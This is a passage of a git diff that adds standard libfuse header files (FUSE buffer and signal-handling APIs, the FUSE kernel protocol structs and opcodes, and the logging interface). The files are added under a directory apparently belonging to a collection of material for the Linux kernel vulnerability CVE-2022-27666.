conn->want + * -o [no_]splice_move (un-)sets FUSE_CAP_SPLICE_MOVE in conn->want + * -o [no_]splice_read (un-)sets FUSE_CAP_SPLICE_READ in conn->want + * -o [no_]auto_inval_data (un-)sets FUSE_CAP_AUTO_INVAL_DATA in conn->want + * -o readdirplus=no unsets FUSE_CAP_READDIRPLUS in conn->want + * -o readdirplus=yes sets FUSE_CAP_READDIRPLUS and unsets + * FUSE_CAP_READDIRPLUS_AUTO in conn->want + * -o readdirplus=auto sets FUSE_CAP_READDIRPLUS and + * FUSE_CAP_READDIRPLUS_AUTO in conn->want + * -o [no_]async_dio (un-)sets FUSE_CAP_ASYNC_DIO in conn->want + * -o [no_]writeback_cache (un-)sets FUSE_CAP_WRITEBACK_CACHE in conn->want + * -o time_gran=N sets conn->time_gran + * + * Known options will be removed from *args*, unknown options will be + * passed through unchanged. + * + * @param args argument vector (input+output) + * @return parsed options + **/ +struct fuse_conn_info_opts* fuse_parse_conn_info_opts(struct fuse_args *args); + +/** + * This function applies the (parsed) parameters in *opts* to the + * *conn* pointer. It may modify the following fields: wants, + * max_write, max_readahead, congestion_threshold, max_background, + * time_gran. A field is only set (or unset) if the corresponding + * option has been explicitly set. + */ +void fuse_apply_conn_info_opts(struct fuse_conn_info_opts *opts, + struct fuse_conn_info *conn); + +/** + * Go into the background + * + * @param foreground if true, stay in the foreground + * @return 0 on success, -1 on failure + */ +int fuse_daemonize(int foreground); + +/** + * Get the version of the library + * + * @return the version + */ +int fuse_version(void); + +/** + * Get the full package version string of the library + * + * @return the package version + */ +const char *fuse_pkgversion(void); + +/** + * Destroy poll handle + * + * @param ph the poll handle + */ +void fuse_pollhandle_destroy(struct fuse_pollhandle *ph); + +/* ----------------------------------------------------------- * + * Data buffer * + * ----------------------------------------------------------- */ + +/** + * Buffer flags + */ +enum fuse_buf_flags { + /** + * Buffer contains a file descriptor + * + * If this flag is set, the .fd field is valid, otherwise the + * .mem fields is valid. + */ + FUSE_BUF_IS_FD = (1 << 1), + + /** + * Seek on the file descriptor + * + * If this flag is set then the .pos field is valid and is + * used to seek to the given offset before performing + * operation on file descriptor. + */ + FUSE_BUF_FD_SEEK = (1 << 2), + + /** + * Retry operation on file descriptor + * + * If this flag is set then retry operation on file descriptor + * until .size bytes have been copied or an error or EOF is + * detected. + */ + FUSE_BUF_FD_RETRY = (1 << 3) +}; + +/** + * Buffer copy flags + */ +enum fuse_buf_copy_flags { + /** + * Don't use splice(2) + * + * Always fall back to using read and write instead of + * splice(2) to copy data from one file descriptor to another. + * + * If this flag is not set, then only fall back if splice is + * unavailable. + */ + FUSE_BUF_NO_SPLICE = (1 << 1), + + /** + * Force splice + * + * Always use splice(2) to copy data from one file descriptor + * to another. If splice is not available, return -EINVAL. + */ + FUSE_BUF_FORCE_SPLICE = (1 << 2), + + /** + * Try to move data with splice. + * + * If splice is used, try to move pages from the source to the + * destination instead of copying. See documentation of + * SPLICE_F_MOVE in splice(2) man page. + */ + FUSE_BUF_SPLICE_MOVE = (1 << 3), + + /** + * Don't block on the pipe when copying data with splice + * + * Makes the operations on the pipe non-blocking (if the pipe + * is full or empty). See SPLICE_F_NONBLOCK in the splice(2) + * man page. + */ + FUSE_BUF_SPLICE_NONBLOCK= (1 << 4) +}; + +/** + * Single data buffer + * + * Generic data buffer for I/O, extended attributes, etc... Data may + * be supplied as a memory pointer or as a file descriptor + */ +struct fuse_buf { + /** + * Size of data in bytes + */ + size_t size; + + /** + * Buffer flags + */ + enum fuse_buf_flags flags; + + /** + * Memory pointer + * + * Used unless FUSE_BUF_IS_FD flag is set. + */ + void *mem; + + /** + * File descriptor + * + * Used if FUSE_BUF_IS_FD flag is set. + */ + int fd; + + /** + * File position + * + * Used if FUSE_BUF_FD_SEEK flag is set. + */ + off_t pos; +}; + +/** + * Data buffer vector + * + * An array of data buffers, each containing a memory pointer or a + * file descriptor. + * + * Allocate dynamically to add more than one buffer. + */ +struct fuse_bufvec { + /** + * Number of buffers in the array + */ + size_t count; + + /** + * Index of current buffer within the array + */ + size_t idx; + + /** + * Current offset within the current buffer + */ + size_t off; + + /** + * Array of buffers + */ + struct fuse_buf buf[1]; +}; + +/* Initialize bufvec with a single buffer of given size */ +#define FUSE_BUFVEC_INIT(size__) \ + ((struct fuse_bufvec) { \ + /* .count= */ 1, \ + /* .idx = */ 0, \ + /* .off = */ 0, \ + /* .buf = */ { /* [0] = */ { \ + /* .size = */ (size__), \ + /* .flags = */ (enum fuse_buf_flags) 0, \ + /* .mem = */ NULL, \ + /* .fd = */ -1, \ + /* .pos = */ 0, \ + } } \ + } ) + +/** + * Get total size of data in a fuse buffer vector + * + * @param bufv buffer vector + * @return size of data + */ +size_t fuse_buf_size(const struct fuse_bufvec *bufv); + +/** + * Copy data from one buffer vector to another + * + * @param dst destination buffer vector + * @param src source buffer vector + * @param flags flags controlling the copy + * @return actual number of bytes copied or -errno on error + */ +ssize_t fuse_buf_copy(struct fuse_bufvec *dst, struct fuse_bufvec *src, + enum fuse_buf_copy_flags flags); + +/* ----------------------------------------------------------- * + * Signal handling * + * ----------------------------------------------------------- */ + +/** + * Exit session on HUP, TERM and INT signals and ignore PIPE signal + * + * Stores session in a global variable. May only be called once per + * process until fuse_remove_signal_handlers() is called. + * + * Once either of the POSIX signals arrives, the signal handler calls + * fuse_session_exit(). + * + * @param se the session to exit + * @return 0 on success, -1 on failure + * + * See also: + * fuse_remove_signal_handlers() + */ +int fuse_set_signal_handlers(struct fuse_session *se); + +/** + * Restore default signal handlers + * + * Resets global session. After this fuse_set_signal_handlers() may + * be called again. + * + * @param se the same session as given in fuse_set_signal_handlers() + * + * See also: + * fuse_set_signal_handlers() + */ +void fuse_remove_signal_handlers(struct fuse_session *se); + +/* ----------------------------------------------------------- * + * Compatibility stuff * + * ----------------------------------------------------------- */ + +#if !defined(FUSE_USE_VERSION) || FUSE_USE_VERSION < 30 +# error only API version 30 or greater is supported +#endif + +#ifdef __cplusplus +} +#endif + + +/* + * This interface uses 64 bit off_t. + * + * On 32bit systems please add -D_FILE_OFFSET_BITS=64 to your compile flags! + */ + +#if defined(__GNUC__) && (__GNUC__ > 4 || __GNUC__ == 4 && __GNUC_MINOR__ >= 6) && !defined __cplusplus +_Static_assert(sizeof(off_t) == 8, "fuse: off_t must be 64bit"); +#else +struct _fuse_off_t_must_be_64bit_dummy_struct \ + { unsigned _fuse_off_t_must_be_64bit:((sizeof(off_t) == 8) ? 1 : -1); }; +#endif + +#endif /* FUSE_COMMON_H_ */ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_kernel.h b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_kernel.h new file mode 100644 index 0000000000000000000000000000000000000000..018a00a2da0ff502ab043bc2f62e1025915c4129 --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_kernel.h @@ -0,0 +1,848 @@ +/* SPDX-License-Identifier: ((GPL-2.0 WITH Linux-syscall-note) OR BSD-2-Clause) */ +/* + This file defines the kernel interface of FUSE + Copyright (C) 2001-2008 Miklos Szeredi + + This program can be distributed under the terms of the GNU GPL. + See the file COPYING. + + This -- and only this -- header file may also be distributed under + the terms of the BSD Licence as follows: + + Copyright (C) 2001-2007 Miklos Szeredi. All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions + are met: + 1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + THIS SOFTWARE IS PROVIDED BY AUTHOR AND CONTRIBUTORS ``AS IS'' AND + ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + ARE DISCLAIMED. IN NO EVENT SHALL AUTHOR OR CONTRIBUTORS BE LIABLE + FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS + OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + SUCH DAMAGE. +*/ + +/* + * This file defines the kernel interface of FUSE + * + * Protocol changelog: + * + * 7.9: + * - new fuse_getattr_in input argument of GETATTR + * - add lk_flags in fuse_lk_in + * - add lock_owner field to fuse_setattr_in, fuse_read_in and fuse_write_in + * - add blksize field to fuse_attr + * - add file flags field to fuse_read_in and fuse_write_in + * - Add ATIME_NOW and MTIME_NOW flags to fuse_setattr_in + * + * 7.10 + * - add nonseekable open flag + * + * 7.11 + * - add IOCTL message + * - add unsolicited notification support + * - add POLL message and NOTIFY_POLL notification + * + * 7.12 + * - add umask flag to input argument of create, mknod and mkdir + * - add notification messages for invalidation of inodes and + * directory entries + * + * 7.13 + * - make max number of background requests and congestion threshold + * tunables + * + * 7.14 + * - add splice support to fuse device + * + * 7.15 + * - add store notify + * - add retrieve notify + * + * 7.16 + * - add BATCH_FORGET request + * - FUSE_IOCTL_UNRESTRICTED shall now return with array of 'struct + * fuse_ioctl_iovec' instead of ambiguous 'struct iovec' + * - add FUSE_IOCTL_32BIT flag + * + * 7.17 + * - add FUSE_FLOCK_LOCKS and FUSE_RELEASE_FLOCK_UNLOCK + * + * 7.18 + * - add FUSE_IOCTL_DIR flag + * - add FUSE_NOTIFY_DELETE + * + * 7.19 + * - add FUSE_FALLOCATE + * + * 7.20 + * - add FUSE_AUTO_INVAL_DATA + * + * 7.21 + * - add FUSE_READDIRPLUS + * - send the requested events in POLL request + * + * 7.22 + * - add FUSE_ASYNC_DIO + * + * 7.23 + * - add FUSE_WRITEBACK_CACHE + * - add time_gran to fuse_init_out + * - add reserved space to fuse_init_out + * - add FATTR_CTIME + * - add ctime and ctimensec to fuse_setattr_in + * - add FUSE_RENAME2 request + * - add FUSE_NO_OPEN_SUPPORT flag + * + * 7.24 + * - add FUSE_LSEEK for SEEK_HOLE and SEEK_DATA support + * + * 7.25 + * - add FUSE_PARALLEL_DIROPS + * + * 7.26 + * - add FUSE_HANDLE_KILLPRIV + * - add FUSE_POSIX_ACL + * + * 7.27 + * - add FUSE_ABORT_ERROR + * + * 7.28 + * - add FUSE_COPY_FILE_RANGE + * - add FOPEN_CACHE_DIR + * - add FUSE_MAX_PAGES, add max_pages to init_out + * - add FUSE_CACHE_SYMLINKS + * + * 7.29 + * - add FUSE_NO_OPENDIR_SUPPORT flag + * + * 7.30 + * - add FUSE_EXPLICIT_INVAL_DATA + * - add FUSE_IOCTL_COMPAT_X32 + * + * 7.31 + * - add FUSE_WRITE_KILL_PRIV flag + */ + +#ifndef _LINUX_FUSE_H +#define _LINUX_FUSE_H + +#ifdef __KERNEL__ +#include +#else +#include +#endif + +/* + * Version negotiation: + * + * Both the kernel and userspace send the version they support in the + * INIT request and reply respectively. + * + * If the major versions match then both shall use the smallest + * of the two minor versions for communication. + * + * If the kernel supports a larger major version, then userspace shall + * reply with the major version it supports, ignore the rest of the + * INIT message and expect a new INIT message from the kernel with a + * matching major version. + * + * If the library supports a larger major version, then it shall fall + * back to the major protocol version sent by the kernel for + * communication and reply with that major version (and an arbitrary + * supported minor version). + */ + +/** Version number of this interface */ +#define FUSE_KERNEL_VERSION 7 + +/** Minor version number of this interface */ +#define FUSE_KERNEL_MINOR_VERSION 31 + +/** The node ID of the root inode */ +#define FUSE_ROOT_ID 1 + +/* Make sure all structures are padded to 64bit boundary, so 32bit + userspace works under 64bit kernels */ + +struct fuse_attr { + uint64_t ino; + uint64_t size; + uint64_t blocks; + uint64_t atime; + uint64_t mtime; + uint64_t ctime; + uint32_t atimensec; + uint32_t mtimensec; + uint32_t ctimensec; + uint32_t mode; + uint32_t nlink; + uint32_t uid; + uint32_t gid; + uint32_t rdev; + uint32_t blksize; + uint32_t padding; +}; + +struct fuse_kstatfs { + uint64_t blocks; + uint64_t bfree; + uint64_t bavail; + uint64_t files; + uint64_t ffree; + uint32_t bsize; + uint32_t namelen; + uint32_t frsize; + uint32_t padding; + uint32_t spare[6]; +}; + +struct fuse_file_lock { + uint64_t start; + uint64_t end; + uint32_t type; + uint32_t pid; /* tgid */ +}; + +/** + * Bitmasks for fuse_setattr_in.valid + */ +#define FATTR_MODE (1 << 0) +#define FATTR_UID (1 << 1) +#define FATTR_GID (1 << 2) +#define FATTR_SIZE (1 << 3) +#define FATTR_ATIME (1 << 4) +#define FATTR_MTIME (1 << 5) +#define FATTR_FH (1 << 6) +#define FATTR_ATIME_NOW (1 << 7) +#define FATTR_MTIME_NOW (1 << 8) +#define FATTR_LOCKOWNER (1 << 9) +#define FATTR_CTIME (1 << 10) + +/** + * Flags returned by the OPEN request + * + * FOPEN_DIRECT_IO: bypass page cache for this open file + * FOPEN_KEEP_CACHE: don't invalidate the data cache on open + * FOPEN_NONSEEKABLE: the file is not seekable + * FOPEN_CACHE_DIR: allow caching this directory + * FOPEN_STREAM: the file is stream-like (no file position at all) + */ +#define FOPEN_DIRECT_IO (1 << 0) +#define FOPEN_KEEP_CACHE (1 << 1) +#define FOPEN_NONSEEKABLE (1 << 2) +#define FOPEN_CACHE_DIR (1 << 3) +#define FOPEN_STREAM (1 << 4) + +/** + * INIT request/reply flags + * + * FUSE_ASYNC_READ: asynchronous read requests + * FUSE_POSIX_LOCKS: remote locking for POSIX file locks + * FUSE_FILE_OPS: kernel sends file handle for fstat, etc... (not yet supported) + * FUSE_ATOMIC_O_TRUNC: handles the O_TRUNC open flag in the filesystem + * FUSE_EXPORT_SUPPORT: filesystem handles lookups of "." and ".." + * FUSE_BIG_WRITES: filesystem can handle write size larger than 4kB + * FUSE_DONT_MASK: don't apply umask to file mode on create operations + * FUSE_SPLICE_WRITE: kernel supports splice write on the device + * FUSE_SPLICE_MOVE: kernel supports splice move on the device + * FUSE_SPLICE_READ: kernel supports splice read on the device + * FUSE_FLOCK_LOCKS: remote locking for BSD style file locks + * FUSE_HAS_IOCTL_DIR: kernel supports ioctl on directories + * FUSE_AUTO_INVAL_DATA: automatically invalidate cached pages + * FUSE_DO_READDIRPLUS: do READDIRPLUS (READDIR+LOOKUP in one) + * FUSE_READDIRPLUS_AUTO: adaptive readdirplus + * FUSE_ASYNC_DIO: asynchronous direct I/O submission + * FUSE_WRITEBACK_CACHE: use writeback cache for buffered writes + * FUSE_NO_OPEN_SUPPORT: kernel supports zero-message opens + * FUSE_PARALLEL_DIROPS: allow parallel lookups and readdir + * FUSE_HANDLE_KILLPRIV: fs handles killing suid/sgid/cap on write/chown/trunc + * FUSE_POSIX_ACL: filesystem supports posix acls + * FUSE_ABORT_ERROR: reading the device after abort returns ECONNABORTED + * FUSE_MAX_PAGES: init_out.max_pages contains the max number of req pages + * FUSE_CACHE_SYMLINKS: cache READLINK responses + * FUSE_NO_OPENDIR_SUPPORT: kernel supports zero-message opendir + * FUSE_EXPLICIT_INVAL_DATA: only invalidate cached pages on explicit request + */ +#define FUSE_ASYNC_READ (1 << 0) +#define FUSE_POSIX_LOCKS (1 << 1) +#define FUSE_FILE_OPS (1 << 2) +#define FUSE_ATOMIC_O_TRUNC (1 << 3) +#define FUSE_EXPORT_SUPPORT (1 << 4) +#define FUSE_BIG_WRITES (1 << 5) +#define FUSE_DONT_MASK (1 << 6) +#define FUSE_SPLICE_WRITE (1 << 7) +#define FUSE_SPLICE_MOVE (1 << 8) +#define FUSE_SPLICE_READ (1 << 9) +#define FUSE_FLOCK_LOCKS (1 << 10) +#define FUSE_HAS_IOCTL_DIR (1 << 11) +#define FUSE_AUTO_INVAL_DATA (1 << 12) +#define FUSE_DO_READDIRPLUS (1 << 13) +#define FUSE_READDIRPLUS_AUTO (1 << 14) +#define FUSE_ASYNC_DIO (1 << 15) +#define FUSE_WRITEBACK_CACHE (1 << 16) +#define FUSE_NO_OPEN_SUPPORT (1 << 17) +#define FUSE_PARALLEL_DIROPS (1 << 18) +#define FUSE_HANDLE_KILLPRIV (1 << 19) +#define FUSE_POSIX_ACL (1 << 20) +#define FUSE_ABORT_ERROR (1 << 21) +#define FUSE_MAX_PAGES (1 << 22) +#define FUSE_CACHE_SYMLINKS (1 << 23) +#define FUSE_NO_OPENDIR_SUPPORT (1 << 24) +#define FUSE_EXPLICIT_INVAL_DATA (1 << 25) + +/** + * CUSE INIT request/reply flags + * + * CUSE_UNRESTRICTED_IOCTL: use unrestricted ioctl + */ +#define CUSE_UNRESTRICTED_IOCTL (1 << 0) + +/** + * Release flags + */ +#define FUSE_RELEASE_FLUSH (1 << 0) +#define FUSE_RELEASE_FLOCK_UNLOCK (1 << 1) + +/** + * Getattr flags + */ +#define FUSE_GETATTR_FH (1 << 0) + +/** + * Lock flags + */ +#define FUSE_LK_FLOCK (1 << 0) + +/** + * WRITE flags + * + * FUSE_WRITE_CACHE: delayed write from page cache, file handle is guessed + * FUSE_WRITE_LOCKOWNER: lock_owner field is valid + * FUSE_WRITE_KILL_PRIV: kill suid and sgid bits + */ +#define FUSE_WRITE_CACHE (1 << 0) +#define FUSE_WRITE_LOCKOWNER (1 << 1) +#define FUSE_WRITE_KILL_PRIV (1 << 2) + +/** + * Read flags + */ +#define FUSE_READ_LOCKOWNER (1 << 1) + +/** + * Ioctl flags + * + * FUSE_IOCTL_COMPAT: 32bit compat ioctl on 64bit machine + * FUSE_IOCTL_UNRESTRICTED: not restricted to well-formed ioctls, retry allowed + * FUSE_IOCTL_RETRY: retry with new iovecs + * FUSE_IOCTL_32BIT: 32bit ioctl + * FUSE_IOCTL_DIR: is a directory + * FUSE_IOCTL_COMPAT_X32: x32 compat ioctl on 64bit machine (64bit time_t) + * + * FUSE_IOCTL_MAX_IOV: maximum of in_iovecs + out_iovecs + */ +#define FUSE_IOCTL_COMPAT (1 << 0) +#define FUSE_IOCTL_UNRESTRICTED (1 << 1) +#define FUSE_IOCTL_RETRY (1 << 2) +#define FUSE_IOCTL_32BIT (1 << 3) +#define FUSE_IOCTL_DIR (1 << 4) +#define FUSE_IOCTL_COMPAT_X32 (1 << 5) + +#define FUSE_IOCTL_MAX_IOV 256 + +/** + * Poll flags + * + * FUSE_POLL_SCHEDULE_NOTIFY: request poll notify + */ +#define FUSE_POLL_SCHEDULE_NOTIFY (1 << 0) + +/** + * Fsync flags + * + * FUSE_FSYNC_FDATASYNC: Sync data only, not metadata + */ +#define FUSE_FSYNC_FDATASYNC (1 << 0) + +enum fuse_opcode { + FUSE_LOOKUP = 1, + FUSE_FORGET = 2, /* no reply */ + FUSE_GETATTR = 3, + FUSE_SETATTR = 4, + FUSE_READLINK = 5, + FUSE_SYMLINK = 6, + FUSE_MKNOD = 8, + FUSE_MKDIR = 9, + FUSE_UNLINK = 10, + FUSE_RMDIR = 11, + FUSE_RENAME = 12, + FUSE_LINK = 13, + FUSE_OPEN = 14, + FUSE_READ = 15, + FUSE_WRITE = 16, + FUSE_STATFS = 17, + FUSE_RELEASE = 18, + FUSE_FSYNC = 20, + FUSE_SETXATTR = 21, + FUSE_GETXATTR = 22, + FUSE_LISTXATTR = 23, + FUSE_REMOVEXATTR = 24, + FUSE_FLUSH = 25, + FUSE_INIT = 26, + FUSE_OPENDIR = 27, + FUSE_READDIR = 28, + FUSE_RELEASEDIR = 29, + FUSE_FSYNCDIR = 30, + FUSE_GETLK = 31, + FUSE_SETLK = 32, + FUSE_SETLKW = 33, + FUSE_ACCESS = 34, + FUSE_CREATE = 35, + FUSE_INTERRUPT = 36, + FUSE_BMAP = 37, + FUSE_DESTROY = 38, + FUSE_IOCTL = 39, + FUSE_POLL = 40, + FUSE_NOTIFY_REPLY = 41, + FUSE_BATCH_FORGET = 42, + FUSE_FALLOCATE = 43, + FUSE_READDIRPLUS = 44, + FUSE_RENAME2 = 45, + FUSE_LSEEK = 46, + FUSE_COPY_FILE_RANGE = 47, + + /* CUSE specific operations */ + CUSE_INIT = 4096 +}; + +enum fuse_notify_code { + FUSE_NOTIFY_POLL = 1, + FUSE_NOTIFY_INVAL_INODE = 2, + FUSE_NOTIFY_INVAL_ENTRY = 3, + FUSE_NOTIFY_STORE = 4, + FUSE_NOTIFY_RETRIEVE = 5, + FUSE_NOTIFY_DELETE = 6, + FUSE_NOTIFY_CODE_MAX +}; + +/* The read buffer is required to be at least 8k, but may be much larger */ +#define FUSE_MIN_READ_BUFFER 8192 + +#define FUSE_COMPAT_ENTRY_OUT_SIZE 120 + +struct fuse_entry_out { + uint64_t nodeid; /* Inode ID */ + uint64_t generation; /* Inode generation: nodeid:gen must + be unique for the fs's lifetime */ + uint64_t entry_valid; /* Cache timeout for the name */ + uint64_t attr_valid; /* Cache timeout for the attributes */ + uint32_t entry_valid_nsec; + uint32_t attr_valid_nsec; + struct fuse_attr attr; +}; + +struct fuse_forget_in { + uint64_t nlookup; +}; + +struct fuse_forget_one { + uint64_t nodeid; + uint64_t nlookup; +}; + +struct fuse_batch_forget_in { + uint32_t count; + uint32_t dummy; +}; + +struct fuse_getattr_in { + uint32_t getattr_flags; + uint32_t dummy; + uint64_t fh; +}; + +#define FUSE_COMPAT_ATTR_OUT_SIZE 96 + +struct fuse_attr_out { + uint64_t attr_valid; /* Cache timeout for the attributes */ + uint32_t attr_valid_nsec; + uint32_t dummy; + struct fuse_attr attr; +}; + +#define FUSE_COMPAT_MKNOD_IN_SIZE 8 + +struct fuse_mknod_in { + uint32_t mode; + uint32_t rdev; + uint32_t umask; + uint32_t padding; +}; + +struct fuse_mkdir_in { + uint32_t mode; + uint32_t umask; +}; + +struct fuse_rename_in { + uint64_t newdir; +}; + +struct fuse_rename2_in { + uint64_t newdir; + uint32_t flags; + uint32_t padding; +}; + +struct fuse_link_in { + uint64_t oldnodeid; +}; + +struct fuse_setattr_in { + uint32_t valid; + uint32_t padding; + uint64_t fh; + uint64_t size; + uint64_t lock_owner; + uint64_t atime; + uint64_t mtime; + uint64_t ctime; + uint32_t atimensec; + uint32_t mtimensec; + uint32_t ctimensec; + uint32_t mode; + uint32_t unused4; + uint32_t uid; + uint32_t gid; + uint32_t unused5; +}; + +struct fuse_open_in { + uint32_t flags; + uint32_t unused; +}; + +struct fuse_create_in { + uint32_t flags; + uint32_t mode; + uint32_t umask; + uint32_t padding; +}; + +struct fuse_open_out { + uint64_t fh; + uint32_t open_flags; + uint32_t padding; +}; + +struct fuse_release_in { + uint64_t fh; + uint32_t flags; + uint32_t release_flags; + uint64_t lock_owner; +}; + +struct fuse_flush_in { + uint64_t fh; + uint32_t unused; + uint32_t padding; + uint64_t lock_owner; +}; + +struct fuse_read_in { + uint64_t fh; + uint64_t offset; + uint32_t size; + uint32_t read_flags; + uint64_t lock_owner; + uint32_t flags; + uint32_t padding; +}; + +#define FUSE_COMPAT_WRITE_IN_SIZE 24 + +struct fuse_write_in { + uint64_t fh; + uint64_t offset; + uint32_t size; + uint32_t write_flags; + uint64_t lock_owner; + uint32_t flags; + uint32_t padding; +}; + +struct fuse_write_out { + uint32_t size; + uint32_t padding; +}; + +#define FUSE_COMPAT_STATFS_SIZE 48 + +struct fuse_statfs_out { + struct fuse_kstatfs st; +}; + +struct fuse_fsync_in { + uint64_t fh; + uint32_t fsync_flags; + uint32_t padding; +}; + +struct fuse_setxattr_in { + uint32_t size; + uint32_t flags; +}; + +struct fuse_getxattr_in { + uint32_t size; + uint32_t padding; +}; + +struct fuse_getxattr_out { + uint32_t size; + uint32_t padding; +}; + +struct fuse_lk_in { + uint64_t fh; + uint64_t owner; + struct fuse_file_lock lk; + uint32_t lk_flags; + uint32_t padding; +}; + +struct fuse_lk_out { + struct fuse_file_lock lk; +}; + +struct fuse_access_in { + uint32_t mask; + uint32_t padding; +}; + +struct fuse_init_in { + uint32_t major; + uint32_t minor; + uint32_t max_readahead; + uint32_t flags; +}; + +#define FUSE_COMPAT_INIT_OUT_SIZE 8 +#define FUSE_COMPAT_22_INIT_OUT_SIZE 24 + +struct fuse_init_out { + uint32_t major; + uint32_t minor; + uint32_t max_readahead; + uint32_t flags; + uint16_t max_background; + uint16_t congestion_threshold; + uint32_t max_write; + uint32_t time_gran; + uint16_t max_pages; + uint16_t padding; + uint32_t unused[8]; +}; + +#define CUSE_INIT_INFO_MAX 4096 + +struct cuse_init_in { + uint32_t major; + uint32_t minor; + uint32_t unused; + uint32_t flags; +}; + +struct cuse_init_out { + uint32_t major; + uint32_t minor; + uint32_t unused; + uint32_t flags; + uint32_t max_read; + uint32_t max_write; + uint32_t dev_major; /* chardev major */ + uint32_t dev_minor; /* chardev minor */ + uint32_t spare[10]; +}; + +struct fuse_interrupt_in { + uint64_t unique; +}; + +struct fuse_bmap_in { + uint64_t block; + uint32_t blocksize; + uint32_t padding; +}; + +struct fuse_bmap_out { + uint64_t block; +}; + +struct fuse_ioctl_in { + uint64_t fh; + uint32_t flags; + uint32_t cmd; + uint64_t arg; + uint32_t in_size; + uint32_t out_size; +}; + +struct fuse_ioctl_iovec { + uint64_t base; + uint64_t len; +}; + +struct fuse_ioctl_out { + int32_t result; + uint32_t flags; + uint32_t in_iovs; + uint32_t out_iovs; +}; + +struct fuse_poll_in { + uint64_t fh; + uint64_t kh; + uint32_t flags; + uint32_t events; +}; + +struct fuse_poll_out { + uint32_t revents; + uint32_t padding; +}; + +struct fuse_notify_poll_wakeup_out { + uint64_t kh; +}; + +struct fuse_fallocate_in { + uint64_t fh; + uint64_t offset; + uint64_t length; + uint32_t mode; + uint32_t padding; +}; + +struct fuse_in_header { + uint32_t len; + uint32_t opcode; + uint64_t unique; + uint64_t nodeid; + uint32_t uid; + uint32_t gid; + uint32_t pid; + uint32_t padding; +}; + +struct fuse_out_header { + uint32_t len; + int32_t error; + uint64_t unique; +}; + +struct fuse_dirent { + uint64_t ino; + uint64_t off; + uint32_t namelen; + uint32_t type; + char name[]; +}; + +#define FUSE_NAME_OFFSET offsetof(struct fuse_dirent, name) +#define FUSE_DIRENT_ALIGN(x) \ + (((x) + sizeof(uint64_t) - 1) & ~(sizeof(uint64_t) - 1)) +#define FUSE_DIRENT_SIZE(d) \ + FUSE_DIRENT_ALIGN(FUSE_NAME_OFFSET + (d)->namelen) + +struct fuse_direntplus { + struct fuse_entry_out entry_out; + struct fuse_dirent dirent; +}; + +#define FUSE_NAME_OFFSET_DIRENTPLUS \ + offsetof(struct fuse_direntplus, dirent.name) +#define FUSE_DIRENTPLUS_SIZE(d) \ + FUSE_DIRENT_ALIGN(FUSE_NAME_OFFSET_DIRENTPLUS + (d)->dirent.namelen) + +struct fuse_notify_inval_inode_out { + uint64_t ino; + int64_t off; + int64_t len; +}; + +struct fuse_notify_inval_entry_out { + uint64_t parent; + uint32_t namelen; + uint32_t padding; +}; + +struct fuse_notify_delete_out { + uint64_t parent; + uint64_t child; + uint32_t namelen; + uint32_t padding; +}; + +struct fuse_notify_store_out { + uint64_t nodeid; + uint64_t offset; + uint32_t size; + uint32_t padding; +}; + +struct fuse_notify_retrieve_out { + uint64_t notify_unique; + uint64_t nodeid; + uint64_t offset; + uint32_t size; + uint32_t padding; +}; + +/* Matches the size of fuse_write_in */ +struct fuse_notify_retrieve_in { + uint64_t dummy1; + uint64_t offset; + uint32_t size; + uint32_t dummy2; + uint64_t dummy3; + uint64_t dummy4; +}; + +/* Device ioctls: */ +#define FUSE_DEV_IOC_CLONE _IOR(229, 0, uint32_t) + +struct fuse_lseek_in { + uint64_t fh; + uint64_t offset; + uint32_t whence; + uint32_t padding; +}; + +struct fuse_lseek_out { + uint64_t offset; +}; + +struct fuse_copy_file_range_in { + uint64_t fh_in; + uint64_t off_in; + uint64_t nodeid_out; + uint64_t fh_out; + uint64_t off_out; + uint64_t len; + uint64_t flags; +}; + +#endif /* _LINUX_FUSE_H */ diff --git a/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_log.h b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_log.h new file mode 100644 index 0000000000000000000000000000000000000000..5e112e0f5343c7f8e2e75160c8e60bccd3b8037e --- /dev/null +++ b/cve/linux-kernel/2022/CVE-2022-27666/libfuse/fuse_log.h @@ -0,0 +1,82 @@ +/* + FUSE: Filesystem in Userspace + Copyright (C) 2019 Red Hat, Inc. + + This program can be distributed under the terms of the GNU LGPLv2. + See the file COPYING.LIB. +*/ + +#ifndef FUSE_LOG_H_ +#define FUSE_LOG_H_ + +/** @file + * + * This file defines the logging interface of FUSE + */ + +#include + +#ifdef __cplusplus +extern "C" { +#endif + +/** + * Log severity level + * + * These levels correspond to syslog(2) log levels since they are widely used. + */ +enum fuse_log_level { + FUSE_LOG_EMERG, + FUSE_LOG_ALERT, + FUSE_LOG_CRIT, + FUSE_LOG_ERR, + FUSE_LOG_WARNING, + FUSE_LOG_NOTICE, + FUSE_LOG_INFO, + FUSE_LOG_DEBUG +}; + +/** + * Log message handler function. + * + * This function must be thread-safe. It may be called from any libfuse + * function, including fuse_parse_cmdline() and other functions invoked before + * a FUSE filesystem is created. + * + * Install a custom log message handler function using fuse_set_log_func(). + * + * @param level log severity level + * @param fmt sprintf-style format string including newline + * @param ap format string arguments + */ +typedef void (*fuse_log_func_t)(enum fuse_log_level level, + const char *fmt, va_list ap); + +/** + * Install a custom log handler function. + * + * Log messages are emitted by libfuse functions to report errors and debug + * information. Messages are printed to stderr by default but this can be + * overridden by installing a custom log message handler function. + * + * The log message handler function is global and affects all FUSE filesystems + * created within this process. + * + * @param func a custom log 